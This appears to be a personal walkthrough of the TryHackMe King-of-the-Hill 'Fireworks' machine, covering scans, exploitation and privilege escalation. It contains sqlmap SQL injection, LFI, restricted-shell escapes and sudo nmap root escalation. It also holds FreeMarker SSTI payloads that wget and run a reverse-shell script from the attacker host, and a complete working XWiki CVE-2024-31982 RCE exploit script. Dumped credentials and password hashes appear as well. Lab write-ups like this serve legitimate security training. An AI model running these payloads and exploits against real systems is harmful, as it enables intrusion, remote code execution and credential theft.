Fireworks
TryHackMe KoTH Machine - Fireworks
Port's open -
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 236 Jul 04 11:04 employees.txt
| -rwxrwxr-x 1 0 0 2655 Jul 05 16:08 id_rsa
|_-rw-r--r-- 1 0 0 257 Jul 04 10:13 memo.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.47.242
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.5 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c9:9c:f1:2a:ca:83:c1:1d:54:67:2f:b7:6c:87:f7:80 (RSA)
| 256 ad:88:8b:1f:d2:f3:84:87:36:3c:9d:6d:b0:9e:31:2f (ECDSA)
|_ 256 c0:da:7d:f1:88:c3:96:74:9b:17:f6:d1:da:69:db:1a (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Music Gallery Site - PHP
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
8080/tcp open http-proxy
| http-methods:
|_ Potentially risky methods: PUT PATCH DELETE
| http-cookie-flags:
| /:
| JSESSIONID:
|_ httponly flag not set
|_http-title: Mtons
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Connection: close
| Set-Cookie: JSESSIONID=DTWNhWP-v2bCVm9Oc79Gn_Dc_3bITFsDZQvsgui5; path=/
| Content-Type: text/html;charset=UTF-8
| Content-Language: en-
| Date: Mon, 08 Jul 2024 22:13:45 GMT
| <!DOCTYPE html>
| <html lang="zh-CN">
| <head>
| <!--
| ------------------------------------------------------
| _____ ______ ________ ___ ________ ________
| |\x20 _ \x20 _ \|\x20 __ \|\x20 \x20 |\x20 __ \|\x20 ____\n \x20\x20 \__\x20\x20 \x20\x20 \|\x20/\x20\x20 \x20 \x20\x20 \|\x20 \x20\x20 ___|
| \x20\x20 \|__| \x20 \x20\x20 __ \x20\x20 \x20 \x20\x20 \\x20 \x20\x20 \x20 ___
| \x20\x20 \x20 \x20\x20 \x20\x20 \|\x20 \x20\x20 ____\x20\x20 \\x20 \x20\x20 \|\x20 \n \x20__\x20 \x20__\x20_______\x20_______\x20_______\x20_______\n \|__| \|__|\|_______|\|_______|\|_______|\|_______|
| ------------------------------------------------------------
| version: 3.5.0
| github : https://github.com/langhsu/mblog
| ------------
| HTTPOptions:
| HTTP/1.1 200 OK
| Allow: GET,HEAD,POST,PUT,PATCH,DELETE,OPTIONS
| Connection: close
| Set-Cookie: JSESSIONID=ee2DAc--KODvY3emOORt1RYWTP9eH1EVV0bMi-cg; path=/
| Content-Length: 0
|_ Date: Mon, 08 Jul 2024 22:13:46 GMT
9999/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.10)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Werkzeug/0.16.1 Python/3.8.10Found an id_rsa private ssh key via ftp
id_rsa private ssh key via ftpcracked pass for key -
trustno1
ssh2john id_rsa > forjohn
john forjohn -w=/usr/share/wordlists/rockyou.txtSearching for music gallery site exploit
music gallery site exploithttps://github.com/navaidzansari/CVE_Demo/blob/main/2023/Music%20Gallery%20Site%20-%20SQL%20Injection%201.mdExploiting SQLI on endpoint /classes/Master.php -
/classes/Master.php -It might be different endpoint, its random. Box even has a broken access control vuln, every poc you can find in above links
GET /classes/Master.php?f=get_music_details&id=1* HTTP/1.1
Host: 10.10.91.230
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=rat59huouim1urikmd93jonrtc
Upgrade-Insecure-Requests: 1sqlmap -r req.txt --dbsgot admin hash after dumping the db
admin:Atarea51LFI after admin dashboard access -
http://10.10.91.230/admin/?page=/etc/passwdInitial Foothold on the box as david user -
david user -ssh -i id_rsa david@ip
trustno1root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
landscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
ec2-instance-connect:x:112:65534::/nonexistent:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:119:MySQL Server,,,:/nonexistent:/bin/false
dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
david:x:1001:1001:David Levinson,,,:/home/david:/usr/bin/fireshell
thomas:x:1002:1002:Thomas J Whitmore,,,:/home/thomas:/bin/bash
steven:x:1003:1003:Steven Hiller,,,:/home/steven:/bin/bash
ftp:x:115:122:ftp daemon,,,:/srv/ftp:/usr/sbin/nologinescape the fireshell -
fireshell -notes
^R^X
reset; bash 1>&0 2>&0privesc to root -
TF=$(mktemp)
echo 'os.execute("/bin/bash")' > $TF
sudo nmap --script=$TFFireshell
#!/usr/bin/python3
import os
import subprocess
import shlex
from cmd import Cmd
HOMEDIR = os.path.expanduser(os.path.normpath('~'))
os.chdir(HOMEDIR)
class MyPrompt(Cmd):
prompt = "fireshell>> "
intro = "Welcome to fireshell :) input 'help' for a list of available commands. Powered by python Cmd!"
def onecmd(self, line):
try:
return super().onecmd(line)
except Exception as e:
print(f"{e}")
return False # don't stop
def do_exit(self, inp):
print("Bye")
return True
def help_exit(self):
print("Close this session")
def default(self, inp):
if inp == "q":
return self.do_exit(inp)
print("Default: {}".format(inp))
def do_pwd(self, arg):
res = subprocess.run('pwd', shell=True, text=True, capture_output=True).stdout
print(res)
def do_echo(self, arg):
args = shlex.split(arg)
res = subprocess.run(['echo', *args], text=True, capture_output=True).stdout
print(res)
def do_ls(self, arg):
res = subprocess.run(['ls', HOMEDIR], text=True, capture_output=True).stdout
print(res)
def do_cat(self, arg):
args = shlex.split(arg)
if args[0][0] == '/':
fname = args[0]
else:
fname = '~/' + args[0]
fname = os.path.expanduser(os.path.normpath(fname))
print(fname)
if fname.startswith(HOMEDIR):
res = subprocess.run(['cat', fname], text=True, capture_output=True).stdout
print(res)
else:
print('You can only access files on the safe directory.')
def do_ping(self, arg):
args = shlex.split(arg)
res = subprocess.run(['ping', '-c4', args[0]], text=True, capture_output=True)
print(res.stderr)
print(res.stdout)
def do_notes(self, arg):
my_env = {**os.environ, 'SHELL': '/usr/bin/bash'}
res = subprocess.call('nano ' + HOMEDIR + '/notes.txt', shell=True, text=True, env=my_env)
def do_monitor(self, arg):
res = subprocess.call('top', shell=True, text=True)
def do_shell(self, arg):
print('Currently disabled for security reasons...')
if __name__ == "__main__":
MyPrompt().cmdloop()Port 8080 - mblog
<!--
------------------------------------------------------
_____ ______ ________ ___ ________ ________
|\ _ \ _ \|\ __ \|\ \ |\ __ \|\ ____\
\ \ \\\__\ \ \ \ \|\ /\ \ \ \ \ \|\ \ \ \___|
\ \ \\|__| \ \ \ __ \ \ \ \ \ \\\ \ \ \ ___
\ \ \ \ \ \ \ \|\ \ \ \____\ \ \\\ \ \ \|\ \
\ \__\ \ \__\ \_______\ \_______\ \_______\ \_______\
\|__| \|__|\|_______|\|_______|\|_______|\|_______|
------------------------------------------------------------
version: 3.5.0
github : https://github.com/langhsu/mblog
------------------------------------------------------------
-->
https://gitee.com/mtons/mblogDefault Admin Creds for mblog 3.5.0 -
mblog 3.5.0 -admin:12345SSTI - CVE-2024-28713
CVE-2024-28713https://github.com/JiangXiaoBaiJia/cve/blob/main/Mblog%20blog%20system%20has%20SSTI%20template%20injection%20vulnerability.md
https://www.vicarius.io/vsociety/posts/ssti-in-mblog-351-a-tale-of-a-glorified-rce-cve-2024-28713-novel-exploitindex.ftl -
<#include "/default/inc/layout.ftl"/>
<#assign topId = 1 >>>
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("wget http://10.8.47.242/revshell.sh")}
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("bash revshell.sh")}
<@layout.extends name="/inc/layout.ftl">
<@layout.put block="contents">
<#assign topId = 1 />
<!-- top -->
<div class="row">
<@contents channelId=topId size=8>python3 mblog_ssti.py --url http://10.10.221.203:8080/ --username admin --password 12345 --theme-template-path voldemort/hoodtemp/vold.zipMysql db root pass -
root:Password321
debian-sys-maint:qjBwvEtYOe5gvPGb<#include "/default/inc/layout.ftl"/>
<#assign topId = 1 >>>
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("wget http://10.8.47.242/revshell.sh")}
<#assign ex="freemarker.template.utility. Execute"?new()>${ex("bash revshell.sh")}Xwiki on port 8080 -
port 8080 -8080/tcp open http-proxy
| http-title: Home - XWiki
|_Requested resource was bin/view/Main/
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404
| Content-Script-Type: text/javascript
| Set-Cookie: JSESSIONID=F72192932FE1B317F1B4B4C7B45E9075; Path=/; HttpOnly
| Pragma: no-cache
| Cache-Control: no-cache
| Expires: Wed, 31 Dec 1969 23:59:59 GMT
| Content-Type: text/html;charset=UTF-8
| Content-Language: en
| Content-Length: 35030
| Date: Tue, 09 Jul 2024 17:58:43 GMT
| Connection: close
| <!DOCTYPE html>
| <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" data-xwiki-paged-media="paper" data-xwiki-reference="xwiki:Main.DocumentDoesNotExist.WebHome" data-xwiki-document="Main.DocumentDoesNotExist.WebHome" data-xwiki-wiki="xwiki" data-xwiki-space="Main.DocumentDoesNotExist" data-xwiki-page="WebHome" data-xwiki-isnew="true" data-xwiki-version="1.1" data-xwiki-rest-url="/rest/wikis/xwiki/spaces/Main/spaces/DocumentDoesNotExist/pages/WebHome" data-xwiki-locale="" data-xwiki-form-token="G
| GetRequest:
| HTTP/1.1 302
| Content-Script-Type: text/javascript
| Location: http://localhost:8080/bin/view/Main/
| Content-Length: 0
| Date: Tue, 09 Jul 2024 17:58:39 GMT
| Connection: close
| HTTPOptions:
| HTTP/1.1 200
| Content-Script-Type: text/javascript
| Allow: GET, HEAD, TRACE, OPTIONS
| Content-Length: 0
| Date: Tue, 09 Jul 2024 17:58:39 GMT
| Connection: close
| RTSPRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 1924
| Date: Tue, 09 Jul 2024 17:58:39 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
| Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_ Request</h1><hr class="line" /><p><b>Type</b> Exception Report</p><p><b>Message</b> Invalid character found in the HTTP protocol [RTSP/1.00x0d0x0a0x0d0x0a...]</p><p><b>Description</b> The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid
| http-methods:
|_ Potentially risky methods: TRACE
|_http-open-proxy: Proxy might be redirecting requestsDefault admin creds -
admin:admin123XWiki RCE (CVE-2024-31982) - exploit
https://www.vicarius.io/vsociety/posts/xwiki-rce-cve-2024-31982-exploitimport sys
import requests
import argparse
import re
import urllib3
import urllib.parse
from requests.exceptions import RequestException
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
VULNERABLE_ENDPOINT = "/bin/get/Main/DatabaseSearch?outputSyntax=plain&space=&text="
def extract_description(text):
pattern = r'<description>RSS feed for search on \}\}\}(.*?)</description>'
matches = re.findall(pattern, text, re.DOTALL)
if matches:
return matches[0]
else:
print("No text found in the response.")
return None
def make_request(url):
try:
response = requests.get(url, verify=False, timeout=50) # Skip SSL verification for simplicity
if response.status_code == 200:
return response.text
else:
return None
except RequestException:
return None
def test_host(url, cmd):
try:
groovy_cmd = (
"def sout = new StringBuilder(), serr = new StringBuilder(); "
"def proc = '{cmd}'.execute(); proc.consumeProcessOutput(sout, serr); "
"proc.waitForOrKill(1000); println \"$sout\";".format(cmd=cmd)
)
payload = '}}}{{async async=false}}{{groovy}}' + groovy_cmd + '{{/groovy}}{{/async}}'
encoded_payload = urllib.parse.quote_plus(payload).replace('>','<')
fullurl = f"{url}{VULNERABLE_ENDPOINT}{encoded_payload}"
body = make_request(fullurl)
if body:
extracted_text = extract_description(body)
if extracted_text:
print(extracted_text)
except RequestException:
print(f"Timeout: {url}")
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='POC for CVE-2024-31982: XWiki Platform Remote Code Execution.')
parser.add_argument('-u', '--url', required=True, help='Target URL (e.g., http://target)')
parser.add_argument('-c', '--cmd', required=True, help='Cmd to run')
args = parser.parse_args()
test_host(args.url, args.cmd)python3 xwiki_rce.py -u http://10.10.145.232:8080 -c "wget 10.8.47.242/vold.sh"
python3 xwiki_rce.py -u http://10.10.145.232:8080 -c "chmod +x vold.sh"
python3 xwiki_rce.py -u http://10.10.145.232:8080 -c "./vold.sh"
ls -l /root/id_rsaThomas user from docker -
sudo vim /etc/hosts
:!/bin/bashusername="tomcat" password="s3cret" Fireshell 3 - escape less
lessnotes
!/bin/bashMagento 2.4.6 - Bitnami on port 8080 -
port 8080 -db' => [
'table_prefix' => '',
'connection' => [
'default' => [
'host' => 'mariadb:3306',
'dbname' => 'bitnami_magento',
'username' => 'bn_magento',
'password' => 'Shopaholic47',
'model' => 'mysql4',
'engine' => 'innodb',
'initStatements' => 'SET NAMES utf8;',
'active' => '1',
'driver_options' => [
1014 => false
]
]
]+-------------+---------+-------------------------------------------------------------------------------------------------------------------+
| password_id | user_id | password_hash |
+-------------+---------+-------------------------------------------------------------------------------------------------------------------+
| 1 | 1 | bc88e499a457950a30200af2ebc6127227a0026a9de2b20908f58aadaa269dcf:3D49Qomw5wtDm4ibNpTzIzMufvJJhFq2:3_32_2_67108864 |
| 2 | 2 | abd404f51885e94e0217d6620b80f782706eb299c461189d18de3772165bea54:16y3e0yCyuwFUVLvi4chSeSNYZ5biG9m:3_32_2_67108864 |
| 3 | 2 | 21664bec41130a45ac6ae202cc7a75a5f24f394beffabe66bdaa1a540b178376:ErJZDzUBi9ls9MULLlcKQdZ3SccSUnsJ:3_32_2_67108864 | -> admin
+-------------+---------+-------------------------------------------------------------------------------------------------------------------+JWT Cryptographic key /bitnami/magento/app/etc/env.php
/bitnami/magento/app/etc/env.phpfd20f5db49b9e1710d973d197888dc08XXE Magento -
https://github.com/bigb0x/CVE-2024-34102/blob/main/cve-2024-34102.pyThomas id_rsa path
/bitnami/magento/pub/media/downloadable/files/links/i/d/id_rsaGrep pattern to search for flags -
grep -RrioE "thm{.*?" 2>/dev/nullLast updated